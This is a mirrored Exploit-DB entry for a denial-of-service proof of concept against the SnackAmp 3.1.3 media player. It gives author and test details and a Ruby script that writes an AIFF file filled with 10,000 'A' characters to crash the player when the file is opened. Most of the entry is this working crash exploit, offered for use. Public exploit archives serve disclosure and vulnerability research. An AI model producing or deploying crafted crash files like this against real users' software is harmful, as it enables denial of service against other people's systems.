exploit-db-mirror/exploits/linux/dos/18692.rb
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

17 lines
No EOL
563 B
Ruby
Executable file

SnackAmp 3.1.3 Malicious aiff File Denial of service
===================================================================================
# Exploit Title:SnackAmp 3.1.3 Malicious aiff File Denial of service
# Download link :http://sourceforge.net/projects/snackamp/
# Author: Ahmed Elhady Mohamed
# Email : ahmed.elhady.mohamed@gmail.com
# version: 3.1.3
# Category: DOS
# Tested on: ubuntu 11.4
===================================================================================
File.open "crash1.aiff" , "w" do |file|
buffer = "A" * 10000
file.puts buffer
end